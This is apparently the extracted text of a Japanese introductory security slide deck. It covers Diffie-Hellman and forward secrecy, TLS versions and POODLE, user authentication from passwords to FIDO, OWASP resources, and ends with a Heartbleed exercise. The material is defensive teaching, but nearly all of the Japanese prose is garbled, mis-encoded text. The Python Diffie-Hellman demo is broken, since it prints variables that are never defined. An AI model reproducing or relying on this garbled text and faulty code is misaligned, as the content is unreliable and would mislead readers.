ڞ௨伴Λ࡞Δ

View Slide

͋Δཚ਺nΛ࡞Δ
nΛ΋ͱʹ
ڞ௨伴Λ࡞Δ
nΛ΋ͱʹ
ڞ௨伴Λ࡞Δ
ڞ௨伴҉߸Ͱ
҉߸Խ͞Εͨ௨৴
nΛ΋ͱʹ
ڞ௨伴Λ࡞Δ
nΛ΋ͱʹ
ڞ௨伴Λ࡞Δ
ϑΥϫʔυηΩϡϦςΟ
௨৴͕ߦΘΕͨޙͰαʔόূ໌ॻͷൿີ伴͕όϨͯ΋
ͦΕ·ͰʹߦΘΕͨ௨৴಺༰͕όϨͳ͍Α͏ʹ͢Δ͜ͱ
RSAͰڞ༗伴ͷૉΛ௨৴૬खʹૹΔͱ
ϑΥϫʔυηΩϡϦςΟΛ࣮ݱͰ͖ͳ͍
ͦͷޙԿΒ͔ͷཧ༝Ͱൿີ伴͕ެʹͳΔͱ
ୈࡾऀ͸อଘ͓͍ͯͨ͠௨৴಺༰͔Β
ڞ௨伴ΛऔΓग़ͯ͠
શͯͷ௨৴಺༰Λ஌Δ͜ͱ͕Ͱ͖Δ

View Slide

཭ࢄର਺໰୊
G = xa mod p (ͨͩ͠p͸ૉ਺Ͱ 2 ≦ a < p)
͜ͷΑ͏ͳࣜʹ͓͍ͯ
xͱaͱp͔ΒG͸ର਺࣌ؒͰٻ·Δ͕
xͱGͱp͔ΒaΛٻΊΔʹ͸ࢦ਺࣌ؒΛཁ͢Δ
ಛʹp͕ڊେͳૉ਺ͷ৔߹
aΛݱ࣮తͳ࣌ؒͰٻΊΒΕͳ͘ͳΔ

View Slide

Diffie-Hellman伴ڞ༗
G = xa mod p (ͨͩ͠p͸ૉ਺Ͱ 2 ≦ a < p)
͜ͷΑ͏ͳࣜʹ͓͍ͯ
xͱaͱp͔ΒG͸ର਺࣌ؒͰٻ·Δ͕
xͱGͱp͔ΒaΛٻΊΔʹ͸ࢦ਺࣌ؒΛཁ͢Δ
͜ͷඇରশੑΛ࢖ͬͯ௨৴ܦ࿏্ʹݟ͑Δ৘ใ͚ͩͰ͸
༰қʹ伴ΛٻΊΒΕͳ͍Α͏ʹ͢Δ
ಛʹp͕ڊେͳૉ਺ͷ৔߹
aΛݱ࣮తͳ࣌ؒͰٻΊΒΕͳ͘ͳΔ

View Slide

͋Δཚ਺aΛ࡞Δ ͋Δཚ਺bΛ࡞Δ
Ga = xa mod p Gb = xb mod p
n = Gba mod p n = Gab mod p
n͸ͲͪΒͷܭࢉํ๏Ͱ΋
ಉ͡஋ʹͳΔ
nΛ΋ͱʹ
ڞ௨伴Λ࡞Δ
nΛ΋ͱʹ
ڞ௨伴Λ࡞Δ
͜͜Ͱަ׵͞ΕΔGa Gb
͔Β
aͱbΛ஌Δࣄ͸Ͱ͖ͳ͍

View Slide

# -*- coding: utf-8 -*-
import random
random.seed()
# pͱx͸ࣄલʹ௨৴૬खͱڞ༗͓ͯ͘͠ = ౪ௌऀʹݟ͑Δ
p=152219 # ೚ҙͷૉ਺
x=2 # 2Ҏ্pະຬͷ೚ҙͷࣗવ਺
# ͜ͷ஋͸௨৴ʹ৐ͤͳ͍ = ౪ௌऀʹݟ͑ͳ͍
secret1=random.randint(2,p)
print( u'Alice͕࡞ͬͨൿີͷ஋: %d' % secret1 )
print( u'Bob͕࡞ͬͨൿີͷ஋: %d' % secret2 )
# ͜ͷ஋͸௨৴Ͱ૬खʹ౉͢ = ౪ௌऀʹݟ͑Δ
public1=pow( x, secret1, p )
print( u'Alice͔ΒBobʹૹΔ஋: %d' % public1 )
print( u'Bob͔ΒAliceʹૹΔ஋: %d' % public2 )
# ͜ͷ஋͕Ұக͢Δ
key1=pow( public2, secret1, p )
print( u'Alice͕Bob͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: %d' % key1 )
print( u'Bob͕Alice͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: %d' % key2 )
$ ./dh.py
Alice͕࡞ͬͨൿີͷ஋: 118909
Bob͕࡞ͬͨൿີͷ஋: 89005
Alice͔ΒBobʹૹΔ஋: 26981
Bob͔ΒAliceʹૹΔ஋: 123319
Alice͕Bob͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: 7243
Bob͕Alice͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: 7243

View Slide

# -*- coding: utf-8 -*-
import random
random.seed()
p=152219 # ೚ҙͷૉ਺
# ͜ͷ஋͸௨৴ʹ৐ͤͳ͍ = ౪ௌऀʹݟ͑ͳ͍
# ͜ͷ஋͸௨৴Ͱ૬खʹ౉͢ = ౪ௌऀʹݟ͑Δ
print( u'Alice͕Bob͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: %d' % key1 )
print( u'Bob͕Alice͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: %d' % key2 )
$ ./dh.py
Alice͕࡞ͬͨൿີͷ஋: 118909
Bob͕࡞ͬͨൿີͷ஋: 89005
Alice͔ΒBobʹૹΔ஋: 26981
Bob͔ΒAliceʹૹΔ஋: 123319
Alice͕Bob͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: 7243
Bob͕Alice͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: 7243
7243ͱ͍͏஋Λڞ༗Ͱ͖ͨ
͜ͷ஋Λ΋ͱʹͯ͠ڞ௨伴҉߸ͷ伴Λ࡞Δ͜ͱ͕Ͱ͖Δ

View Slide

Diffie-Hellman Ephemeral
Ұ࣌త
# -*- coding: utf-8 -*-
import random
random.seed()
p=152219 # ೚ҙͷૉ਺
# ͜ͷ஋͸௨৴ʹ৐ͤͳ͍ = ౪ௌऀʹݟ͑ͳ͍
# ͜ͷ஋͸௨৴Ͱ૬खʹ౉͢ = ౪ௌऀʹݟ͑Δ
͜ͷ஋Λ伴ڞ༗Λߦ͏౓ʹ
มߋ͢Δ
͜ͷ஋͕ແ͍ͱ伴Λ
ಛఆͰ͖ͳ͍͕
͜ͷ஋ࣗମ͸౪ௌͰ͖ͳ͍ͨΊ
ϑΥϫʔυηΩϡϦςΟ͕ಘΒΕΔ
ൿີͷ஋͕ຖճมΘΔͷͰ૬ख͕ຊ෺͔Ͳ͏͔ͷ֬ೝ͕Ͱ͖ͳ͘ͳΔ
૬ख͕ຊ෺Ͱ͋Δ͜ͱͷ֬ೝ͸RSAΛ࢖ͬͯߦ͏

View Slide

DHE-RSA-AES256-SHA256
TLS͕Diffie-Hellman伴ڞ༗Λ࢖͍ͬͯΔ͔Ͳ͏͔
TLSͷ҉߸εΠʔτ໊ΛݟΕ͹Θ͔Δ
ڞ௨伴ͷڞ༗ʹ
Diffie-Hellman Ephemeral
Λ࢖͏
௨৴૬ख͕ຊ෺Ͱ͋ΔࣄΛ
RSAͰ͔֬ΊΔ
256bitͷAESΛ࢖ͬͯσʔλΛ҉߸Խ͢Δ
σʔλͷվ͟ΜΛݕग़͢ΔͨΊʹڞ௨伴ͱσʔλͷ
SHA-256ϋογϡΛ࢖͏

View Slide

ପԁ཭ࢄର਺໰୊
཭ࢄର਺໰୊͸
ର਺࣌ؒͰܭࢉͨ݁͠Ռ͔Βٯࢉ͢Δͷʹ
ࢦ਺࣌ؒΛཁ͢Δ໰୊Ͱ͋Δ
ٯࢉͰ͖ͳ͍Θ͚Ͱ͸ͳ͍ͷͰ
े෼େ͖ͳ஋Λ࢖ͬͯٯࢉʹ͕͔͔࣌ؒΔΑ͏ʹ͢Δඞཁ͕͋Δ
ପԁ཭ࢄର਺໰୊͸
ର਺࣌ؒͰܭࢉͨ݁͠Ռ͔Βٯࢉ͢Δํ๏͕஌ΒΕ͍ͯͳ͍
ٯࢉ͢Δํ๏͕ൃݟ͞Εͳ͍ݶΓ͸
૯౰ͨΓ߈ܸʹ଱͑ΒΕΔఔ౓ͷେ͖͞ͷ஋Ͱྑ͍

View Slide

ପԁۂઢDiffie-Hellman伴ڞ༗
཭ࢄର਺໰୊ͷ୅ΘΓʹପԁ཭ࢄର਺໰୊Λ࢖͏
TLSʹ͓͍ͯ͸
Elliptic Curve Diffie-Hellman Ephemeral
ུͯ͠ECDHEͱදه͞ΕΔ
ݱ࣌఺Ͱ౪ௌऀʹݱ࣮తͳ࣌ؒͰ伴Λ஌ΒΕͳ͍ͨΊʹ
RFC7525Ͱਪ঑͞Ε͍ͯΔ஋ͷେ͖͞
%J⒏F)FMMNBO伴ڞ༗ ପԁۂઢ%J⒏F)FMMNBO伴ڞ༗
CJU CJU
https://tools.ietf.org/html/rfc7525

View Slide

͜͜·Ͱͷ࿩͕Α͘෼͔Βͳ͔ͬͨਓʹ΋
͓͍֮͑ͯͯཉ͍͠ࣄ
౪ௌऀʹ৘ใ͕࿙Εͳ͍Α͏ʹਖ਼͘͠҉߸Λ࢖͏ͷ͸೉͍͠
ಛผͳཧ༝͕ͳ͍ݶΓTLSΛ࢖͓͏

View Slide

TLS͸ྺ࢙͋ΔϓϩτίϧͳͷͰ
ࠓ೔Ͱ͸҆શͱݴ͑ͳ͍҉߸ٕज़ʹ΋ରԠ͍ͯ͠Δ
TLS͸઀ଓ࣌ʹαʔόͱΫϥΠΞϯτ͕࢖͑Δ҉߸ٕज़Λௐ΂ͯ
྆ऀ͕ରԠ͍ͯ͠Δ҉߸ٕज़Ͱ௨৴ΛࢼΈΔ
ྫ͑͹ࠓ೔Ͱ͸ݱ࣮తͳ࣌ؒͰղಡͰ͖Δ512bitͷRSA΍RC4ʹ΋ରԠ͍ͯ͠Δ
SSL 2.0 SSL 3.0 TLS 1.0 TLS 1.1 TLS 1.2 TLS 1.3
com
ing
soon
1994೥ 1996೥ 1999೥ 2006೥ 2008೥

View Slide

ಡΊΔ
com
ing
soon
1994೥ 1996೥ 1999೥ 2006೥ 2008೥
2010೥୅ʹೖͬͯݹ͍҉߸Λબ͹ͤͯ
ݹ͍҉߸ͷऑ఺Λಥ͍ͯ౪ௌΛߦ͏੬ऑੑ͕ग़͖ͯͨ
ΠϚυΩͷ҉߸OK ΠϚυΩͷ҉߸ແཧ
ΠϚυΩͷ҉߸OK
ΠϚυΩͷ҉߸ແཧ
ऑ͍҉߸ ऑ͍҉߸
Alice Bob
౪ௌऀ

View Slide

POODLE(CVE-2014-3566)
2010೥୅ʹೖͬͯݹ͍҉߸Λબ͹ͤͯ
SSL 3.0ͷن্֨ͷऑ఺Λಥ͍ͯ౪ௌΛߦ͏੬ऑੑ͕ग़͖ͯͨ
͜͜ʹ
/*45ʹΑΔ100%-&ͷղઆΛషΔ

View Slide

com
ing
soon
1994೥ 1996೥ 1999೥ 2006೥ 2008೥
TLS 1.3Ͱ͸ࠓͰ͸҆શͰͳ͍҉߸ٕज़͕࠷ॳ͔Β࢖༻ෆೳʹͳΔ
TLS1.3͕ҰൠతʹͳΔ·Ͱ͸
TLS 1.2͕࣋ͭػೳͷ͏ͪ
ةݥͱ͞Ε͍ͯΔػೳΛ੾ͬͨঢ়ଶͰӡ༻
SSL 3.0ͷΑ͏ͳຊ౰ʹݹ͍҉߸͔͠ରԠ͍ͯ͠ͳ͍௨৴૬ख͸
௨৴ΛఘΊͯ΋Β͏͔͠ͳ͍

View Slide

RFC7525
Recommendations for Secure Use of Transport Layer Security (TLS)
and Datagram Transport Layer Security (DTLS)
TLS 1.2ͷػೳͷ͏ͪ
ԿΛ੾͓ͬͯ͘΂͖͔͕
·ͱΊΒΕ͍ͯΔ
IUUQTUPPMTJFUGPSHIUNMSGD
ඇެࣜͳ೔ຊޠ༁IUUQTTVNNFSXJOEKQEPDTSGD
͜͜ʹ
3'$ͷ"CTUSBDUΛషΔ

View Slide

͜͜·Ͱͷ࿩͕Α͘෼͔Βͳ͔ͬͨਓʹ΋
͓͍֮͑ͯͯཉ͍͠ࣄ
౪ௌऀʹ৘ใ͕࿙Εͳ͍Α͏ʹਖ਼͘͠҉߸Λ࢖͏ͷ͸೉͍͠
ಛผͳཧ༝͕ͳ͍ݶΓTLSΛ࢖͓͏
TLSΛ࢖͏࣌͸
ࠓͰ͸҆શͰ͸ͳ͍ݹ͍ػೳΛ੾Ζ͏
NEW!

View Slide

ຊ෺ͷϢʔβͱ
ِ෺ͷϢʔβΛݟ෼͚Δ

View Slide

ೝূ
Alice
Aliceͷ;ΓΛ͢Δ
ѱҙ͋Δୈࡾऀ
"MJDFͰ͢
"MJDFͰ͢
αʔό͕ຊ෺͔Ͳ͏͔Λ͔֬ΊΔ࣌ͱҧ͍
Ϣʔβ͸ূ໌ॻΛ͍࣋ͬͯͳ͍

View Slide

ύεϫʔυೝূ
ύεϫʔυ͸
Ͱ͢
ݹ͔͘Βར༻͞Ε͍ͯΔϢʔβͷೝূํ๏
ຊ෺ͷ"MJDFͳΒ
ύεϫʔυΛ஌͍ͬͯΔഺ
ʜ
Alice
Aliceͷ;ΓΛ͢Δ
ѱҙ͋Δୈࡾऀ

View Slide

ύεϫʔυೝূͷ໰୊఺
ʜ๨Ε·ͨ͠
͍ΖΜͳαʔϏεʹ͍ΖΜͳύεϫʔυΛઃఆ͍ͯͨ͠Β
Ϣʔβ͸ύεϫʔυΛ๨ΕΔ
ຊ෺ͷ"MJDFͳΒ
ύεϫʔυΛ஌͍ͬͯΔഺ
ʜ
Alice
Aliceͷ;ΓΛ͢Δ
ѱҙ͋Δୈࡾऀ

View Slide

ൿີͷ࣭໰
͜ΕͰ͸ύεϫʔυΛΑΓ؆୯ʹ͍ͯ͠ΔΑ͏ͳ΋ͷͰ͋Δ
޷͖ͳ৯΂෺͸
ͳΜͰ͔͢
Alice
Aliceͷ;ΓΛ͢Δ
ѱҙ͋Δୈࡾऀ
ਖ਼ղ
ύεϫʔυΛઃఆ͠௚͍ͯͩ͘͠͞

View Slide

OAuthೝূ
ଟ͘ͷϢʔβ͸
Googleɺfacebook౳ͷ
ΞΧ΢ϯτΛ͍࣋ͬͯΔ
αʔϏε͸
ࣗ෼͕ͲΜͳ৘ใΛ
ඞཁͱ͍ͯ͠Δ͔Λొ࿥͢Δ
Ϣʔβ͸ͨ͘͞ΜͷαʔϏεΛར༻͍ͯ͠Δ
ͦΕΒʹݸผʹύεϫʔυΛઃఆ͍ͯͨ͠Β
ύεϫʔυΛ๨Εͯ͠·͏ͷ͸౰વͰ͋Δ

View Slide

OAuthೝূ
͋ͷαʔϏε
͋ͷαʔϏεʹ
ϩάΠϯ͍ͨ͠
͋ͷαʔϏεʹ
͜Ε͚ͩͷ৘ใΛ౉͚͢ͲOK?
OK
͋ͷαʔϏεʹ
ϦΫΤεττʔΫϯ***Λ
౉͍ͯͩ͘͠͞

View Slide

OAuthೝূ
͋ͷαʔϏε
ϦΫΤεττʔΫϯ***
Ͱ͢
ϦΫΤεττʔΫϯ***
ͱ͔͍͏ͷ͕དྷͨΜ͚ͩͲ
ͦͷਓ͸͏ͪͷAlice͞ΜͳͷͰ
௨͍ͯ͋͛ͯͩ͘͠͞
Alice͞ΜͷৄࡉΛ஌Γ͍ͨ৔߹͸
ΞΫηετʔΫϯ???Λ࢖͍ͬͯͩ͘͞

View Slide

͜͜ʹ
χίχίಈըͷ
ϩάΠϯը໘ΛషΔ
Ϣʔβ͸ීஈ࢖͍ͬͯΔSNS౳ʹ
ϩάΠϯ͢Ε͹αʔϏεΛར༻Ͱ͖Δ
αʔϏεຖʹ
ύεϫʔυΛ֮͑Δඞཁ΋
αʔϏεຖʹύεϫʔυΛೖྗ͢Δඞཁ΋ͳ͍
αʔϏεఏڙऀ͸
۩ମతͳϢʔβೝূΛ
ΑͦͷαʔϏεʹؙ౤͛Ͱ͖Δ
͜͏͍͏ͷ
OAuthೝূ
OAuthೝূΛ׆༻͍ͯ͠ΔαʔϏεͷྫ χίχίಈը
https://account.nicovideo.jp/login

View Slide

2ཁૉೝূ
Ϣʔβ͕ຊ෺Ͱ͋Δ͜ͱΛ֬ೝ͢Δखஈ͸3ͭʹ෼ྨͰ͖Δ
1.Ϣʔβ͸ԿΛ஌͍ͬͯΔ͔
ύεϫʔυೝূ౳
2.Ϣʔβ͸ԿͰ͋Δ͔
ࢦ໲ೝূ౳
3.Ϣʔβ͸ԿΛ͍࣋ͬͯΔ͔
਎෼ূͷఏࣔ౳
1Ҏ֎͸ಛผͳ૷ஔΛཁ͢Δҝ
ैདྷଟ͘ͷΠϯλʔωοτ্ͷαʔϏε͸1͚ͩΛ࢖͖ͬͯͨ

View Slide

ϑΟογϯά
ຊ෺ͷαʔϏε
ِ෺ͷαʔϏε
ύεϫʔυ͸
Ͱ͢
ύεϫʔυ͸
Ͱ͢
ύεϫʔυ͸
Ͱ͢
Ϣʔβ͕ԿΛ஌͍ͬͯΔ͔͸
ϑΟογϯάʹର͢Δ଱ੑ͕ͳ͍

View Slide

2ཁૉೝূ
Ϣʔβ͕ຊ෺Ͱ͋Δ͜ͱΛ֬ೝ͢Δखஈ͸3ͭʹ෼ྨͰ͖Δ
ύεϫʔυೝূ౳
ࢦ໲ೝূ౳
2ͱ3ͷ͍ͣΕ͔Λซ༻ͯ͠ͳΓ͢·͠Λ๷͙ඞཁ͕͋Δ

View Slide

SMSΛར༻ͨ͠2ཁૉೝূ
Ϣʔβ͸ొ࿥͞Ε͍ͯΔܞଳి࿩Λ͍࣋ͬͯΔ͔
ύεϫʔυ͸
Ͱ͢
4.4ʹૹͬͨ൪߸Λ
ೖྗ͍ͯͩ͘͠͞

ϩάΠϯ੒ޭ

View Slide

SMSΛར༻ͨ͠2ཁૉೝূͷ໰୊఺
ύεϫʔυ͸
Ͱ͢

ѱҙ͋Δୈࡾऀ͕SMSΛ೷͖ݟͰ͖ͨΒ
ೝূΛಥഁ͞ΕΔ
ͦ΋ͦ΋൪߸ೖྗ͢Δͷ
ΊΜͲ͍͘͞
΋ͬͱ҆શ͔ͭखܰʹ
2ཁૉೝূ͢ΔͨΊͷಓ۩͸
࡞Εͳ͍ͩΖ͏͔

View Slide

FIDO U2F
https://www.yubico.com/products/yubikey-hardware/
Ϣʔβ͕͔֬ʹ͜ͷUSBσόΠεΛ͍࣋ͬͯΔࣄΛ
ެ։伴҉߸Λ࢖ͬͯূ໌͢Δ૷ஔ
͜͜ʹ
࣮ࡍʹചΒΕ͍ͯΔ'*%06'ͷσόΠεͷը૾ΛషΔ

View Slide

FIDO U2FͰϢʔβొ࿥
Ϣʔβొ࿥
AppIDΛఴ͑ͯ伴ੜ੒Λཁٻ
"QQ*%ʹରԠ͢Δ
ൿີ伴ͱެ։伴Λ࡞Δ
ެ։伴ͱೝূثূ໌ॻͱ
ೝূثূ໌ॻͰ࡞ͬͨॺ໊Λฦ͢
ॺ໊Λ࢖ͬͯ
৴པͰ͖ΔೝূثͰ͋ΔࣄΛ֬ೝ
ެ։伴Λอଘ
ొ࿥׬ྃ

View Slide

FIDO U2FͰϩάΠϯ
ύεϫʔυೝূ
"QQ*%ʹରԠ͢Δ
ൿີ伴ͰDIBMMFOHFΛ҉߸Խ
҉߸Խͨ͠challengeΛฦ͢
อଘͯ͋͠Δެ։伴Ͱ
DIBMMFOHFΛ෮߸Ͱ͖ΔࣄΛ֬ೝ
ೝূ׬ྃ
ύεϫʔυΛ֬ೝ
AppIDͱchallengeΛૹ৴

View Slide

FIDO UAF
ͦ΋ͦ΋ύεϫʔυΛೖྗ͢Δͷ͕ΊΜͲ͍͘͞
ύεϫʔυೝূ౳
ࢦ໲ೝূ౳
1Λ࢖Θͣʹ2ͱ3Ͱ2ཁૉೝূ͠Α͏

View Slide

FIDO UAF
ੜମೝূ͕ඞཁʹͳΔͨΊෳࡶͳϋʔυ΢ΣΞ͕ඞཁʹͳΔ͕
Xperia XZ1͕FIDO UAF 1.1ʹ४ڌͨ͠ॳͷσόΠεʹͳͬͨࣄΛใ͡Δهࣄ
https://fidoalliance.org/first-fido-uaf-1-1-implementations-ease-deployment-
advanced-biometric-authentication-android-devices/
αʔϏε͕FIDO UAFʹରԠ͢Δ͜ͱͰ
͜͏ͨ͠σόΠεͷϢʔβʹύεϫʔυෆཁͷೝূΛఏڙͰ͖Δ
͜͜ʹ
9QFSJB9;͕'*%06"'ʹ४ڌͨ͜͠ͱΛใ͡ΔهࣄΛషΔ

View Slide

Webϖʔδʹର͢Δ
߈ܸʹඋ͑Δ

View Slide

OWASP
https://www.owasp.org/
҆શͳWebΞϓϦέʔγϣϯͷҝͷ৘ใͷڞ༗΍ܒൃΛߦ͏
ΦʔϓϯίϛϡχςΟ
͜͜ʹ
08"41ͷτοϓϖʔδΛషΔ

View Slide

OWASP Top 10
WebΞϓϦέʔγϣϯ։ൃऀ΁ͷ஫ҙשىΛ໨తͱͯ͠
WebΞϓϦέʔγϣϯͷ୅දతͳ੬ऑੑΛ10छྨબΜͩ΋ͷ
https://www.owasp.org/images/2/23/OWASP_Top_10-2017%28ja%29.pdf
࠷৽൛͸OWASP Top 10 2017Ͱ೔ຊޠ༁΋ଘࡏ͢Δ
͜͜ʹ
08"415PQͷදࢴΛషΔ

View Slide

OWASP Top 10
ΠϯδΣΫγϣϯ
ೝূͷෆඋ
ػඍͳ৘ใͷ࿐ग़
9.-֎෦ΤϯςΟςΟࢀর
ΞΫηε੍ޚͷෆඋ
ෆద੾ͳηΩϡϦςΟઃఆ
ΫϩεαΠτεΫϦϓςΟϯά
҆શͰͳ͍σγϦΞϥΠθʔγϣϯ
ط஌ͷ੬ऑੑͷ͋Δίϯϙʔωϯτͷ࢖༻
ෆे෼ͳϩΪϯάͱϞχλϦϯά

View Slide

͜͜ʹ
08"415PQͷΠϯδΣΫγϣϯͷղઆΛషΔ
OWASP Top 10
https://www.owasp.org/images/2/23/
OWASP_Top_10-2017%28ja%29.pdf
੬ऑੑͷछྨຖʹ
ͲͷΑ͏ʹൃݟ͢Ε͹ྑ͍͔
ͲͷΑ͏ʹ๷ࢭ͢Ε͹ྑ͍͔
͕వΊΒΕ͍ͯΔ
ΠϯδΣΫγϣϯʹର͢Δ๷ࢭํ๏
ΠϯλϓϦλ͔ΒΫΤϦΛ౤͛ͳ͍
ύϥϝʔλԽ͞ΕͨΠϯλʔϑΣʔε
·ͨ͸ORMΛ࢖͏
ಡ΋͏

View Slide

͜͜ʹ
08"41"474ͷදࢴΛషΔ
OWASP Application Security Verification Standard
WebΞϓϦέʔγϣϯͷ҆શੑΛݕূ͢ΔͨΊʹ
νΣοΫ͢΂͖߲໨Λ·ͱΊͨ΋ͷ
࠷৽൛͸OWASP ASVS 3.0.1Ͱ೔ຊޠ༁΋ଘࡏ͢Δ
IUUQTXXXKQDFSUPSKQTFDVSFDPEJOHNBUFSJBMTPXBTQBTWTIUNM

View Slide

͜͜ʹ
08"41"474ͷνΣοΫ߲໨ͷҰ෦ΛషΔ
OWASP Application Security Verification Standard
IUUQTXXXKQDFSUPSKQTFDVSFDPEJOH
NBUFSJBMTPXBTQBTWTIUNM
͋ΒΏΔΞϓϦέʔγϣϯ͕ຬͨ͢΂͖Ϩϕϧ1
ݸਓ৘ใ΍վ͟Μ͞ΕΔͱࠔΔ৘ใΛѻ͏
ΞϓϦέʔγϣϯ͕ຬͨ͢΂͖Ϩϕϧ2
ো֐ͷൃੜ͕૊৫ͷଘଓ΍ਓ໋ʹؔΘΔ
ΞϓϦέʔγϣϯ͕ຬͨ͢΂͖Ϩϕϧ3
Ϩϕϧ্͕͕Δ΄ͲνΣοΫ߲໨͕૿͑Δ
ύεϫʔυมߋػೳʹ
ݹ͍ύεϫʔυͷೖྗ
৽͍͠ύεϫʔυͷೖྗ
৽͍͠ύεϫʔυͷ֬ೝ
ͷ3ͭΛཁٻ͍ͯ͠Δ͔Ͳ͏͔ΛνΣοΫ
WebΞϓϦέʔγϣϯΛ࡞ͬͨΒ
νΣοΫ͠Α͏

View Slide

͜͜ʹ
08"418FC(PBUͷը૾ΛషΔ
OWASP WebGoat
https://github.com/WebGoat/WebGoat
JavaͰॻ͔ΕͨWebΞϓϦέʔγϣϯ
ҙਤతʹ༷ʑͳ੬ऑੑ͕࢓ࠐ·Ε͍ͯΔ
੬ऑੑΛ࣮ફతʹֶͼ͍ͨ
ࣗ෼ͷߦͳ͍ͬͯΔ੬ऑੑͷνΣοΫ͕
ਖ਼͍͔͔֬͠Ί͍ͨ
ͦ͏͍͏࣌ʹ࢖͑Δ

View Slide

࠷ޙʹ

View Slide

͋ΒΏΔιϑτ΢ΣΞηΩϡϦςΟ͸
෺ཧతͳηΩϡϦςΟΛલఏͱ͍ͯ͠Δ
ѱҙ͋Δୈࡾऀ͕αʔόϧʔϜʹ৵ೖͯ͠ిݯέʔϒϧΛൈ͘͜ͱͰ
αʔϏεΛఀࢭͤ͞Δ͜ͱ͕Ͱ͖Δ੬ऑੑ
·ͣށకΓ
ιϑτ΢ΣΞηΩϡϦςΟ͸ͦΕ͔Βͩ
͜ͷΑ͏ͳ߈ܸʹରͯ͠ιϑτ΢ΣΞ͸جຊతʹଧͭख͕ͳ͍

View Slide

՝୊
CVE-2014-0160
͜ͷ੬ऑੑ͕Ͳ͏͍͏࣌ʹԿ͕ى͜Δ΋ͷͰ
ͦͷ݁ՌͲͷΑ͏ͳѱӨڹ͕༧૝͞ΕΔ͔Λઆ໌͍ͯͩ͘͠͞
͜ͷ੬ऑੑΛճආ͢ΔͨΊʹͱΓ͏ΔରԠΛ1ͭҎ্ड़΂͍ͯͩ͘͞

View Slide

セキュリティ入門

セキュリティ入門

Fadis

More Decks by Fadis

Other Decks in Programming

Featured

Transcript